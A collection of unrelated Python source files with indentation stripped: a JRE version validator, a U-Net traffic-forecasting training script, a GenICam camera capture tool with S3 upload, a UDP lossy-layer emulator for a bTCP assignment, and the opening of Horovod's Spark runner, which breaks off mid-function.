def _record_last_received_text(self, text: str):
"""
Record last received text for debug purpose.
"""
self._last_received_text = text[:1000]
|
jre_validator.py
|
#! /usr/bin/env python
import os
from dbx_logger import logger
import threading
import subprocess
import traceback
import shlex
import C
class Command(object):
"""
Enables to run subprocess commands in a different thread with TIMEOUT option.
Based on jcollado's solution:
http://stackoverflow.com/questions/1191374/subprocess-with-timeout/4825933#4825933
"""
command = None
process = None
status = None
output, error = '', ''
def __init__(self, command):
if isinstance(command, basestring):
command = shlex.split(command)
self.command = command
def run(self, timeout=None, **kwargs):
""" Run a command then return: (status, output, error). """
def target(**kwargs):
try:
self.process = subprocess.Popen(self.command, **kwargs)
self.output, self.error = self.process.communicate()
self.status = self.process.returncode
except Exception as ex:
self.error = traceback.format_exception_only(type(ex), ex)
self.status = -1
# default stdout and stderr
if 'stdout' not in kwargs:
kwargs['stdout'] = subprocess.PIPE
if 'stderr' not in kwargs:
kwargs['stderr'] = subprocess.PIPE
# thread
thread = threading.Thread(target=target, kwargs=kwargs)
thread.start()
thread.join(timeout)
if thread.is_alive():
self.process.terminate()
thread.join()
return self.status, self.output, self.error
def matchesAny(line,values):
return line.lstrip().startswith(tuple(values))
def validateJRE(javaCmd):
attrs = {}
reason = ""
operation = "validate java command: {}.".format(javaCmd)
if os.name == "nt":
jreInfoCmd = '"%s" %s' % (javaCmd , C.JRE_INFO_OPTIONS)
else:
jreInfoCmd = '%s %s' % (javaCmd , C.JRE_INFO_OPTIONS)
c = Command(jreInfoCmd)
retval, output, error = c.run(10)
if retval != 0:
reason = error
logger.debug(error)
# smartly parse the error if we can.
for line in error:
if line.startswith("OSError:") or line.startswith("WindowsError"):
reason = line
isValid = False
logger.critical(reason)
else:
pairs = [ line.lstrip().split(' = ', 2) for line in error.splitlines() if matchesAny(line, C.JRE_WANTED_KEYS)]
for pair in pairs:
k, v = pair
attrs[k] = v
version = attrs.get(C.JRE_VERSION_KEY,'')
vendor = attrs.get(C.JRE_VENDOR_KEY,'')
vm = attrs.get(C.JRE_VM_KEY,'')
isValid = (version == C.JRE_WANT_VERSION and vendor == C.JRE_WANT_VENDOR and vm.startswith(C.JRE_WANT_VM))
if not isValid:
reason = {"message": "Unsupported JRE detected",
"jre_using": "Using %s JRE version %s, %s" % (vendor, version, vm),
"jre_need": "Need Oracle Corporation JRE version 1.8"}
logger.critical(reason)
details = [str(reason), operation]
return isValid, " ".join(details)
if os.name == 'nt':
JAVA_DEPENDENCIES = [os.path.join("bin", "java.exe"),
os.path.join("bin", "keytool.exe")]
else:
JAVA_DEPENDENCIES = [os.path.join("bin", "java"),
os.path.join("bin", "keytool")]
def checkDependencies(javaHome):
reason = ""
for dep in JAVA_DEPENDENCIES:
fullPath = os.path.join(javaHome, dep)
if not os.path.exists(fullPath):
reason = "Missing JRE dependency: %s" % fullPath
logger.critical(reason)
return False, reason
return True, reason
|
run.py
|
import random
from random import shuffle
import numpy as np
from datetime import datetime
import time
import queue
import threading
import logging
from PIL import Image
import itertools
import re
import os
import glob
import shutil
import sys
import copy
import h5py
from typing import Any, List, Tuple
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.nn.parallel.data_parallel import data_parallel
import torch.utils.checkpoint as cp
from collections import OrderedDict
from torch import Tensor
target_city = 'BERLIN' # 'BERLIN' 'CHICAGO' 'ISTANBUL' 'MELBOURNE'
input_train_data_folder_path = '../../0_data/' + target_city + '/' + 'training'
input_static_data_path = '../../0_data/' + target_city + '/' + target_city + "_static.h5"
out_dir = 'output'
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
SEED = int(time.time())
num_train_file = 180
num_frame_per_day = 288
num_frame_before = 12
num_frame_sequence = 24
num_frame_out = 6
num_sequence_per_day = num_frame_per_day - num_frame_sequence + 1
height=495
width =436
num_channel=8
num_channel_out=8
num_channel_static = 9
visual_input_channels=105
visual_output_channels=48
vector_input_channels=1
num_epoch_to_train = 100000000
save_per_iteration = 5000
global_step_start = 0
initial_checkpoint = None
initial_checkpoint_optimizer = None
LEARNING_RATE = 3e-4
batch_size = 2
batch_size_val = 1
num_thread=2
num_groups = 8
EPS = 1e-12
np.set_printoptions(precision=8)
NUM_INPUT_CHANNEL = visual_input_channels
NUM_OUTPUT_CHANNEL = visual_output_channels
def get_data_filepath_list_by_year(input_data_folder_path):
data_filepath_list_1 = []
data_filepath_list_2 = []
for filename in os.listdir(input_data_folder_path):
if filename.split('.')[-1] != 'h5':
continue
if filename.startswith('2019'):
data_filepath_list_1.append(os.path.join(input_data_folder_path, filename))
elif filename.startswith('2020'):
data_filepath_list_2.append(os.path.join(input_data_folder_path, filename))
else:
print('Error - Unknown data year\t', filename)
exit(-1)
data_filepath_list_1 = sorted(data_filepath_list_1)
data_filepath_list_2 = sorted(data_filepath_list_2)
return data_filepath_list_1, data_filepath_list_2
class Deconv3x3Block(nn.Sequential):
def __init__(self,
in_size: int,
h_size: int, ) -> None:
super(Deconv3x3Block, self).__init__()
self.add_module('deconv', nn.ConvTranspose2d(in_size, h_size, kernel_size=3, stride=2, padding=1, bias=True))
self.add_module('elu', nn.ELU(inplace=True))
self.add_module('norm', nn.GroupNorm(num_groups=num_groups, num_channels=h_size))
class Conv1x1Block(nn.Sequential):
def __init__(self,
in_size: int,
h_size: int, ) -> None:
super(Conv1x1Block, self).__init__()
self.add_module('conv', nn.Conv2d(in_size, h_size, kernel_size=1, stride=1, padding=0, bias=True))
class Conv3x3Block(nn.Sequential):
def __init__(self,
in_size: int,
h_size: int, ) -> None:
super(Conv3x3Block, self).__init__()
self.add_module('conv', nn.Conv2d(in_size, h_size, kernel_size=3, stride=1, padding=1, bias=True))
self.add_module('elu', nn.ELU(inplace=True))
self.add_module('norm', nn.GroupNorm(num_groups=num_groups, num_channels=h_size))
class AvgBlock(nn.Sequential):
def __init__(self,
kernel_size: int,
stride: int,
padding: int) -> None:
super(AvgBlock, self).__init__()
self.add_module('pool', nn.AvgPool2d(kernel_size=kernel_size, stride=stride, padding=padding))
class MaxBlock(nn.Sequential):
def __init__(self,
kernel_size: int,
stride: int,
padding: int) -> None:
super(MaxBlock, self).__init__()
self.add_module('pool', nn.MaxPool2d(kernel_size=kernel_size, stride=stride, padding=padding))
class DownBlock(nn.Module):
def __init__(self,
in_size: int,
h_size: int,
out_size: int,
do_pool: int = True):
super(DownBlock, self).__init__()
self.do_pool = do_pool
in_size_cum = in_size
self.conv_1 = Conv3x3Block( in_size=in_size_cum, h_size=h_size)
in_size_cum += h_size
self.conv_3 = Conv3x3Block( in_size=in_size_cum, h_size=h_size)
in_size_cum += h_size
self.conv_2 = Conv1x1Block( in_size=in_size_cum, h_size=out_size)
def forward(self, x):
batch_size = len(x)
if self.do_pool:
x = F.interpolate(x, scale_factor=0.7, mode='bilinear', align_corners=False, recompute_scale_factor=None)
x_list = []
x_list.append(x)
x = self.conv_1(x)
x_list.append(x)
x = torch.cat(x_list, 1)
x = self.conv_3(x)
x_list.append(x)
x = torch.cat(x_list, 1)
x = self.conv_2(x)
return x
def cuda(self, ):
super(DownBlock, self).cuda()
self.conv_1.cuda()
self.conv_3.cuda()
self.conv_2.cuda()
return self
class UpBlock(nn.Module):
def __init__(self,
in_size: int,
in_size_2: int,
h_size: int,
out_size: int,
):
super(UpBlock, self).__init__()
self.deconv = Conv3x3Block( in_size=in_size, h_size=h_size)
self.out_conv = Conv3x3Block( in_size=h_size + in_size_2, h_size=out_size)
def forward(self, x1, x2):
x1 = self.deconv(x1)
x1 = F.interpolate(x1, size=x2.size()[2:4], scale_factor=None, mode='bilinear', align_corners=False, recompute_scale_factor=None)
x = torch.cat([x2, x1], dim=1)
return self.out_conv(x)
def cuda(self, ):
super(UpBlock, self).cuda()
self.deconv.cuda()
self.out_conv.cuda()
return self
class NetA(nn.Module):
def __init__(self,):
super(NetA, self).__init__()
self.block0 = DownBlock(in_size=NUM_INPUT_CHANNEL, h_size=128, out_size=128, do_pool=False)
self.block1 = DownBlock(in_size=128, h_size=128, out_size=128,)
self.block2 = DownBlock(in_size=128, h_size=128, out_size=128, )
self.block3 = DownBlock(in_size=128, h_size=128, out_size=128, )
self.block4 = DownBlock(in_size=128, h_size=128, out_size=128, )
self.block5 = DownBlock(in_size=128, h_size=128, out_size=128, )
self.block6 = DownBlock(in_size=128, h_size=128, out_size=128,)
self.block7 = DownBlock(in_size=128, h_size=128, out_size=128,)
self.block20 = Conv3x3Block(in_size=128, h_size=128)
self.block16 = UpBlock(in_size=128, in_size_2=128, h_size=128, out_size=128,)
self.block15 = UpBlock(in_size=128, in_size_2=128, h_size=128, out_size=128,)
self.block14 = UpBlock(in_size=128, in_size_2=128, h_size=128, out_size=128,)
self.block13 = UpBlock(in_size=128, in_size_2=128, h_size=128, out_size=128,)
self.block12 = UpBlock(in_size=128, in_size_2=128, h_size=128, out_size=128,)
self.block11 = UpBlock(in_size=128, in_size_2=128 , h_size=128, out_size=128,)
self.block10 = UpBlock(in_size=128, in_size_2=128 , h_size=128, out_size=128,)
self.out_conv = nn.Sequential(nn.Conv2d(128*1, NUM_OUTPUT_CHANNEL, kernel_size=3, stride=1, padding=1, bias=True))
if 1:
for name, m in self.named_modules():
if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d):
nn.init.kaiming_normal_(m.weight)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.GroupNorm):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.Linear):
nn.init.constant_(m.bias, 0)
def forward(self, x):
batch_size = len(x)
x0 = self.block0(x)
x1 = self.block1(x0)
x2 = self.block2(x1)
x3 = self.block3(x2)
x4 = self.block4(x3)
x5 = self.block5(x4)
x6 = self.block6(x5)
x7 = self.block7(x6)
x = self.block20(x7)
x = self.block16(x, x6)
x = self.block15(x, x5)
x = self.block14(x, x4)
x = self.block13(x, x3)
x = self.block12(x, x2)
x = self.block11(x, x1)
x = self.block10(x, x0)
x = self.out_conv(x)
x = torch.sigmoid(x)
return x
def cuda(self, ):
super(NetA, self).cuda()
self.block0.cuda()
self.block1.cuda()
self.block2.cuda()
self.block3.cuda()
self.block4.cuda()
self.block5.cuda()
self.block6.cuda()
self.block7.cuda()
self.block20.cuda()
self.block16.cuda()
self.block15.cuda()
self.block14.cuda()
self.block13.cuda()
self.block12.cuda()
self.block11.cuda()
self.block10.cuda()
self.out_conv.cuda()
return self
if __name__ == '__main__':
if initial_checkpoint == None:
assert global_step_start == 0
else:
assert global_step_start > 0
random.seed(SEED)
np.random.seed(SEED)
torch.manual_seed(SEED)
torch.cuda.manual_seed_all(SEED)
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
torch.backends.cudnn.deterministic = False
try:
if not os.path.exists(out_dir):
os.makedirs(out_dir)
except Exception:
print('out_dir not made')
net = NetA().cuda()
optimizer = optim.Adam(filter(lambda p: p.requires_grad, net.parameters()),lr=LEARNING_RATE)
loss_func2 = nn.MSELoss()
if initial_checkpoint is not None:
print('Loading ', initial_checkpoint)
state_dict = torch.load(initial_checkpoint, map_location=lambda storage, loc: storage)
net.load_state_dict(state_dict, strict=True)
optimizer_state_dict_ = torch.load(initial_checkpoint_optimizer, map_location=lambda storage, loc: storage)
optimizer_state_dict = optimizer_state_dict_['optimizer']
optimizer.load_state_dict(optimizer_state_dict)
train_data_filepath_list, val_data_filepath_list = get_data_filepath_list_by_year(input_train_data_folder_path)
train_set = []
for i in range(len(train_data_filepath_list)):
for j in range(num_sequence_per_day):
train_set.append( (i,j) )
num_iteration_per_epoch = int(len(train_set) / batch_size)
print('num_iteration_per_epoch:', num_iteration_per_epoch)
assert num_iteration_per_epoch > 10
val_set = []
val_skip_k = 0
val_skip_ratio = 5
for i in range(len(val_data_filepath_list)):
for j in range(0, num_sequence_per_day, num_frame_sequence):
val_skip_k += 1
if val_skip_k % val_skip_ratio == 0:
val_set.append( (i,j) )
num_val_iteration_per_epoch = int(len(val_set) / batch_size_val)
print('num_val_iteration_per_epoch:', num_val_iteration_per_epoch)
static_data = None
if 1:
file_path = input_static_data_path
fr = h5py.File(file_path, 'r')
a_group_key = list(fr.keys())[0]
data = np.asarray(fr[a_group_key], np.uint8)
static_data = data[np.newaxis,:,:,:]
static_data = static_data.astype(np.float32)
static_data = static_data / 255.0
train_input_queue = queue.Queue()
train_output_queue = queue.Queue()
def load_train_multithread():
while True:
if train_input_queue.empty() or train_output_queue.qsize() > 8:
time.sleep(0.1)
continue
i_j_list = train_input_queue.get()
train_orig_data_batch_list = []
train_data_batch_list = []
train_data_mask_list = []
train_stat_batch_list = []
for train_i_j in i_j_list:
(i,j) = train_i_j
file_path = train_data_filepath_list[i]
fr = h5py.File(file_path, 'r')
a_group_key = list(fr.keys())[0]
data = fr[a_group_key]
train_data_batch_list.append(data[j:j+num_frame_sequence,:,:,:][np.newaxis,:,:,:,:])
train_data_batch = np.concatenate(train_data_batch_list, axis=0)
input_data = train_data_batch[:,:num_frame_before ,:,:,:]
orig_label = train_data_batch[:, num_frame_before:,:,:,:num_channel_out]
true_label = np.concatenate((orig_label[:, 0:3, :,:,:], orig_label[:, 5::3,:,:,:] ), axis=1)
input_data = input_data.astype(np.float32)
true_label = true_label.astype(np.float32)
input_data = input_data / 255.0
true_label = true_label / 255.0
input_data = np.moveaxis(input_data, -1, 2).reshape((batch_size, -1, height, width))
true_label = np.moveaxis(true_label, -1, 2).reshape((batch_size, -1, height, width))
input_data = np.concatenate((input_data, np.repeat(static_data, batch_size, axis=0)), axis=1)
train_output_queue.put( (input_data, true_label) )
thread_list = []
assert num_thread > 0
for i in range(num_thread):
t = threading.Thread(target=load_train_multithread)
t.start()
net.train()
sum_train_loss = 0.0
sum_train_iter = 0
global_step = global_step_start
for epoch in range(num_epoch_to_train):
np.random.shuffle(train_set)
for a in range(num_iteration_per_epoch):
i_j_list = []
for train_i_j in train_set[a * batch_size : (a+1) * batch_size]:
i_j_list.append(train_i_j)
train_input_queue.put(i_j_list)
for a in range(num_iteration_per_epoch):
if global_step % save_per_iteration == 0:
net.eval()
state_dict_0 = copy.deepcopy(net.state_dict())
torch.save(state_dict_0, out_dir + '/%09d_model.pth' % (global_step))
torch.save(
{
'optimizer': optimizer.state_dict(),
'global_step': global_step,
'epoch': epoch,
},
out_dir + '/%09d_optimizer.pth' % (global_step))
eval_loss_list = list()
eval_loss_list = [0]
with torch.no_grad():
for a in range(num_val_iteration_per_epoch):
val_orig_data_batch_list = []
val_data_batch_list = []
val_data_mask_list = []
val_stat_batch_list = []
for i_j in val_set[a * batch_size_val : (a+1) * batch_size_val]:
(i,j) = i_j
file_path = val_data_filepath_list[i]
fr = h5py.File(file_path, 'r')
a_group_key = list(fr.keys())[0]
data = fr[a_group_key]
val_data_batch_list.append(data[j:j+num_frame_sequence,:,:,:][np.newaxis,:,:,:,:])
val_data_batch = np.concatenate(val_data_batch_list, axis=0)
input_data = val_data_batch[:,:num_frame_before ,:,:,:]
orig_label = val_data_batch[:, num_frame_before:,:,:,:num_channel_out]
true_label = np.concatenate((orig_label[:, 0:3, :,:,:], orig_label[:, 5::3,:,:,:]), axis=1)
input_data = input_data.astype(np.float32)
true_label = true_label.astype(np.float32)
input_data = input_data / 255.0
true_label = true_label / 255.0
input_data = np.moveaxis(input_data, -1, 2).reshape((batch_size_val, -1, height, width))
true_label = np.moveaxis(true_label, -1, 2).reshape((batch_size_val, -1, height, width))
input_data = np.concatenate((input_data,np.repeat(static_data, batch_size_val, axis=0)), axis=1)
input = torch.from_numpy(input_data).float().cuda()
target = torch.from_numpy(true_label).float().cuda()
prediction = net(input)
loss = loss_func2(prediction, target)
eval_loss_list.append(loss.item())
avg_train_loss = sum_train_loss / (float(sum_train_iter)+EPS)
sum_train_loss = 0.0
sum_train_iter = 0
print('global_step:', global_step, '\t', 'epoch:', epoch, \
'\t', 'train_loss:', avg_train_loss, \
'\t', 'eval_loss:', np.mean(eval_loss_list), \
'\t', datetime.now(), )
debug_out = open('res.txt', 'a')
debug_out.write(str(global_step))
debug_out.write('\t')
debug_out.write('%.8f' % float(avg_train_loss))
debug_out.write('\t')
debug_out.write('%.8f' % float(np.mean(eval_loss_list)))
debug_out.write('\n')
debug_out.close()
net.train()
while train_output_queue.empty():
time.sleep(0.1)
(input_data, true_label) = train_output_queue.get()
optimizer.zero_grad()
input = torch.from_numpy(input_data).float().cuda()
target = torch.from_numpy(true_label).float().cuda()
prediction = net(input)
loss = loss_func2(prediction, target)
sum_train_iter += 1
sum_train_loss += loss.item()
loss.backward()
optimizer.step()
global_step += 1
|
capture.py
|
import copy
import os
import time
import threading
import typing
import queue
from absl import app, flags
from cv2 import cv2
from genicam.gentl import TimeoutException
from harvesters.core import Harvester
import numpy as np
import s3_util
WINDOW_NAME = "Capture"
flags.DEFINE_string(
"gentl_producer_path",
"/opt/mvIMPACT_Acquire/lib/x86_64/mvGenTLProducer.cti",
"Path to the GenTL producer .cti file to use.",
)
flags.DEFINE_integer(
"display_width", 1080, "Target image width for the display window.",
)
flags.DEFINE_integer("frame_rate", 30, "Frame rate to acquire images at.")
flags.DEFINE_string("image_dir", "../images", "The directory to save images to.")
flags.DEFINE_string("image_file_type", "jpg", "File type to save images as.")
flags.DEFINE_string("s3_bucket_name", None, "S3 bucket to send images to.")
flags.DEFINE_string("s3_image_dir", "data/images", "Prefix of the s3 image objects.")
class RGB8Image:
BORDER_COLOR = (3, 252, 53)
BORDER_WIDTH = 10
def __init__(
self, width: int, height: int, data_format: str, image_data: np.ndarray
):
self.image_data: np.ndarray = self._process_image(
image_data, data_format, width, height
)
def get_height(self):
return self.image_data.shape[0]
def get_width(self):
return self.image_data.shape[1]
def get_channels(self):
if len(self.image_data.shape) < 3:
return 1
return self.image_data.shape[2]
def get_data(self) -> np.ndarray:
return self.image_data
def _process_image(self, image_data, data_format, width, height) -> np.ndarray:
if data_format == "Mono8":
return cv2.cvtColor(image_data.reshape(height, width), cv2.COLOR_GRAY2RGB)
elif data_format == "BayerRG8":
return cv2.cvtColor(
image_data.reshape(height, width), cv2.COLOR_BayerRG2RGB
)
elif data_format == "BayerGR8":
return cv2.cvtColor(
image_data.reshape(height, width), cv2.COLOR_BayerGR2RGB
)
elif data_format == "BayerGB8":
return cv2.cvtColor(
image_data.reshape(height, width), cv2.COLOR_BayerGB2RGB
)
elif data_format == "BayerBG8":
return cv2.cvtColor(
image_data.reshape(height, width), cv2.COLOR_BayerBG2RGB
)
elif data_format == "RGB8":
return image_data.reshape(height, width, 3)
elif data_format == "BGR8":
return cv2.cvtColor(image_data.reshape(height, width, 3), cv2.COLOR_BGR2RGB)
else:
print("Unsupported pixel format: %s" % data_format)
raise ValueError("Unsupported pixel format: %s" % data_format)
def get_resized_image(self, target_width: int) -> np.ndarray:
resize_ratio = float(target_width / self.get_width())
return cv2.resize(self.image_data, (0, 0), fx=resize_ratio, fy=resize_ratio)
def get_highlighted_image(self, target_width: int = None) -> np.ndarray:
return cv2.copyMakeBorder(
(
self.get_resized_image(target_width)
if target_width is not None
else self.get_data()
)[
self.BORDER_WIDTH : -self.BORDER_WIDTH,
self.BORDER_WIDTH : -self.BORDER_WIDTH,
],
top=self.BORDER_WIDTH,
bottom=self.BORDER_WIDTH,
left=self.BORDER_WIDTH,
right=self.BORDER_WIDTH,
borderType=cv2.BORDER_ISOLATED,
value=self.BORDER_COLOR,
)
def save(self, file_path: str) -> bool:
try:
cv2.imwrite(file_path, self.get_data())
except FileExistsError:
return False
return True
def get_newest_image(cam):
try:
retrieved_image = None
with cam.fetch_buffer() as buffer:
component = buffer.payload.components[0]
retrieved_image = RGB8Image(
component.width,
component.height,
component.data_format,
component.data.copy(),
)
return retrieved_image
except TimeoutException:
print("Timeout ocurred waiting for image.")
return None
except ValueError as err:
print(err)
return None
def acquire_images(cam, save_queue: queue.Queue) -> None:
cv2.namedWindow(WINDOW_NAME)
cv2.moveWindow(WINDOW_NAME, 0, 0)
try:
cam.start_image_acquisition()
print("Acquisition started.")
while True:
retrieved_image = get_newest_image(cam)
if retrieved_image is None:
break
cv2.imshow(
WINDOW_NAME,
retrieved_image.get_resized_image(flags.FLAGS.display_width),
)
keypress = cv2.waitKey(1)
if keypress == 27:
# escape key pressed
break
elif cv2.getWindowProperty(WINDOW_NAME, cv2.WND_PROP_VISIBLE) < 1:
# x button clicked
break
elif keypress == 13:
# Enter key pressed
cv2.imshow(
WINDOW_NAME,
retrieved_image.get_highlighted_image(flags.FLAGS.display_width),
)
save_queue.put(retrieved_image)
cv2.waitKey(500)
finally:
save_queue.put(None)
cv2.destroyWindow(WINDOW_NAME)
cam.stop_image_acquisition()
print("Acquisition Ended.")
def save_images(save_queue: queue.Queue, use_s3: bool) -> None:
try:
while True:
image = save_queue.get(block=True)
if image is None:
break
file_path = os.path.join(
flags.FLAGS.image_dir,
"%i.%s" % (time.time(), flags.FLAGS.image_file_type),
)
save_successfull = image.save(file_path)
print("Image saved at: %s" % file_path)
if use_s3 and save_successfull:
s3_util.upload_files(
flags.FLAGS.s3_bucket_name, [file_path], flags.FLAGS.s3_image_dir,
)
finally:
print("Saving complete.")
def apply_camera_settings(cam) -> None:
# Configure newest only buffer handling
cam.keep_latest = True
cam.num_filled_buffers_to_hold = 1
# Configure frame rate
cam.remote_device.node_map.AcquisitionFrameRateEnable.value = True
cam.remote_device.node_map.AcquisitionFrameRate.value = min(
flags.FLAGS.frame_rate, cam.remote_device.node_map.AcquisitionFrameRate.max
)
print(
"Acquisition frame rate set to: %3.1f"
% cam.remote_device.node_map.AcquisitionFrameRate.value
)
def create_output_dir(dir_name) -> bool:
if not os.path.isdir(dir_name) or not os.path.exists(dir_name):
print("Creating output directory: %s" % dir_name)
try:
os.makedirs(dir_name)
except OSError:
print("Creation of the directory %s failed" % dir_name)
return False
else:
print("Successfully created the directory %s " % dir_name)
return True
else:
print("Output directory exists.")
return True
def main(unused_argv):
if not create_output_dir(flags.FLAGS.image_dir):
print("Cannot create output annotations directory.")
return
use_s3 = True if flags.FLAGS.s3_bucket_name is not None else False
if use_s3:
if not s3_util.s3_bucket_exists(flags.FLAGS.s3_bucket_name):
use_s3 = False
print(
"Bucket: %s either does not exist or you do not have access to it"
% flags.FLAGS.s3_bucket_name
)
else:
print(
"Bucket: %s exists and you have access to it"
% flags.FLAGS.s3_bucket_name
)
h = Harvester()
h.add_cti_file(flags.FLAGS.gentl_producer_path)
if len(h.cti_files) == 0:
print("No valid cti file found at %s" % flags.FLAGS.gentl_producer_path)
h.reset()
return
print("Currently available genTL Producer CTI files: ", h.cti_files)
h.update_device_info_list()
if len(h.device_info_list) == 0:
print("No compatible devices detected.")
h.reset()
return
print("Available devices List: ", h.device_info_list)
print("Using device: ", h.device_info_list[0])
cam = h.create_image_acquirer(list_index=0)
apply_camera_settings(cam)
save_queue = queue.Queue()
save_thread = threading.Thread(target=save_images, args=(save_queue, use_s3,))
save_thread.start()
acquire_images(cam, save_queue)
save_thread.join()
# clean up
cam.destroy()
h.reset()
print("Exiting.")
if __name__ == "__main__":
app.run(main)
|
lossy_layer.py
|
# ------------------------
# Tom Aarsen - s1027401
# Bart Janssen - s4630270
# ------------------------
import socket, select, threading, time
from btcp.constants import *
from btcp.btcp_segment import BTCPSegment
# Continuously read from the socket and whenever a segment arrives,
# call the lossy_layer_input method of the associated socket.
# When flagged, return from the function.
def handle_incoming_segments(bTCP_sock, event, udp_sock):
while not event.is_set():
# We do not block here, because we might never check the loop condition in that case
rlist, wlist, elist = select.select([udp_sock], [], [], 1)
if rlist:
segment = udp_sock.recvfrom(SEGMENT_SIZE)
bTCP_sock.lossy_layer_input(segment)
# The lossy layer emulates the network layer in that it provides bTCP with
# an unreliable segment delivery service between a and b. When the lossy layer is created,
# a thread is started that calls handle_incoming_segments.
class LossyLayer:
def __init__(self, bTCP_sock, a_ip, a_port, b_ip, b_port):
self._bTCP_sock = bTCP_sock
self._b_ip = b_ip
self._b_port = b_port
self._udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._udp_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._udp_sock.bind((a_ip, a_port))
self._event = threading.Event()
self._thread = threading.Thread(target=handle_incoming_segments, args=(self._bTCP_sock, self._event, self._udp_sock))
self._thread.start()
# Flag the thread that it can stop and close the socket.
def destroy(self):
self._event.set()
self._thread.join()
self._udp_sock.close()
# Put the segment into the network
def send_segment(self, segment):
self._udp_sock.sendto(segment, (self._b_ip, self._b_port))
|
__init__.py
|
# Copyright 2019 Uber Technologies, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# Workaround for https://issues.apache.org/jira/browse/SPARK-22674
# This fix also requires the user to make this same change at the top of their
# training script before importing pyspark (on serialization).
import collections
collections.namedtuple.__hijack = 1
import os
import pyspark
from six.moves import queue
import sys
import threading
from horovod.spark.task import task_service
from horovod.run.common.util import codec, env as env_util, safe_shell_exec, \
timeout, host_hash, secret
from horovod.run.common.util import settings as hvd_settings
from horovod.run.mpi_run import mpi_run
from horovod.spark.driver import driver_service, job_id
def _task_fn(index, driver_addresses, settings):
task = task_service.SparkTaskService(index, settings.key, settings.nic)
try:
driver_client = driver_service.SparkDriverClient(driver_addresses, settings.key, settings.verbose)
driver_client.register_task(index, task.addresses(), host_hash.host_hash())
task.wait_for_initial_registration(settings.timeout)
# Tasks ping each other in a circular fashion to determine interfaces reachable within
# the cluster.
next_task_index = (index + 1) % settings.num_proc
next_task_addresses = driver_client.all_task_addresses(next_task_index)
# We request interface matching to weed out all the NAT'ed interfaces.
next_task_client = \
task_service.SparkTaskClient(next_task_index, next_task_addresses,
settings.key, settings.verbose,
match_intf=True)
driver_client.register_task_to_task_addresses(next_task_index, next_task_client.addresses())
task_indices_on_this_host = driver_client.task_host_hash_indices(
host_hash.host_hash())
if task_indices_on_this_host[0] == index:
# Task with first index will execute orted that will run mpirun_exec_fn for all tasks.
task.wait_for_command_start(settings.timeout)
task.wait_for_command_termination()
else:
# The rest of tasks need to wait for the first task to finish.
first_task_addresses = driver_client.all_task_addresses(task_indices_on_this_host[0])
first_task_client = \
task_service.SparkTaskClient(task_indices_on_this_host[0],
first_task_addresses, settings.key,
settings.verbose)
first_task_client.wait_for_command_termination()
return task.fn_result()
finally:
task.shutdown()
def _make_mapper(driver_addresses, settings):
def _mapper(index, _):
yield _task_fn(index, driver_addresses, settings)
return _mapper
def _make_spark_thread(spark_context, spark_job_group, driver, result_queue,
settings):
def run_spark():
try:
spark_context.setJobGroup(spark_job_group,
"Horovod Spark Run",
interruptOnCancel=True)
procs = spark_context.range(0, numSlices=settings.num_proc)
# We assume that folks caring about security will enable Spark RPC
# encryption, thus ensuring that key that is passed here remains
# secret.
result = procs.mapPartitionsWithIndex(_make_mapper(driver.addresses(), settings)).collect()
result_queue.put(result)
except:
driver.notify_spark_job_failed()
raise
spark_thread = threading.Thread(target=run_spark)
spark_thread.start()
return spark_thread
def run(fn, args=(), kwargs={}, num_proc=None, start_timeout=None, extra_mpi_args=None, env=None,
stdout=None, stderr=None, verbose=1, nic=None, run_func=safe_shell_exec.execute):
"""
Runs Horovod in Spark. Runs `num_proc` processes executing `fn` using the same amount of Spark tasks.
Args:
fn: Function to run.
args: Arguments to pass to `fn`.
kwargs: Keyword arguments to pass to `fn`.
num_proc: Number of Horovod processes. Defaults to `spark.default.parallelism`.
start_timeout: Timeout for Spark tasks to spawn, register and start running the code, in seconds.
If not set, falls back to `HOROVOD_SPARK_START_TIMEOUT` environment variable value.
If it is not set as well, defaults to 600 seconds.
extra_mpi_args: Extra arguments for mpi_run. Defaults to no extra args.
env: Environment dictionary to use in Horovod run. Defaults to `os.environ`.
stdout: Horovod stdout is redirected to this stream. Defaults to sys.stdout.
stderr: Horovod stderr is redirected to this stream. Defaults to sys.stderr.
verbose: Debug output verbosity (0-2). Defaults to 1.
nic: specify the NIC for tcp network communication.
run_func: Run function to use. Must have arguments 'command', 'env', 'stdout', 'stderr'.
Defaults to safe_shell_exec.execute.
Returns:
List of results returned by running `fn` on each rank.
"""
if start_timeout is None:
# Lookup default timeout from the environment variable.
start_timeout = int(os.getenv('HOROVOD_SPARK_START_TIMEOUT', '600'))
tmout = timeout.Timeout(start_timeout,
message='Timed out waiting for {activity}. Please check that you have '
'enough resources to run all Horovod processes. Each Horovod '
'process runs in a Spark task. You may need to increase the '
'start_timeout parameter to a larger value if your Spark resources '
'are allocated on-demand.')
settings = hvd_settings.Settings(verbose=verbose,
extra_mpi_args=extra_mpi_args,
key=secret.make_secret_key(),
timeout=tmout,
nic=nic,
run_func_mode=True)
spark_context = pyspark.SparkContext._active_spark_context
if spark_context is None:
raise Exception('Could not find an active SparkContext, are you '
'running in a PySpark session?')
if num_proc is None:
num_proc = spark_context.defaultParallelism
if settings.verbose >= 1:
print('Running %d processes (inferred from spark.default.parallelism)...' % num_proc)
else:
if settings.verbose >= 1:
print('Running %d processes...' % num_proc)
settings.num_proc = num_proc
result_queue = queue.Queue(1)
spark_job_group = 'horovod.spark.run.%d' % job_id.next_job_id()
driver = driver_service.SparkDriverService(settings.num_proc, fn, args, kwargs,
settings.key, settings.nic)
spark_thread = _make_spark_thread(spark_context, spark_job_group, driver,
result_queue, settings)
try:
driver.wait_for_initial_registration(settings.timeout)
if settings.verbose >= 2:
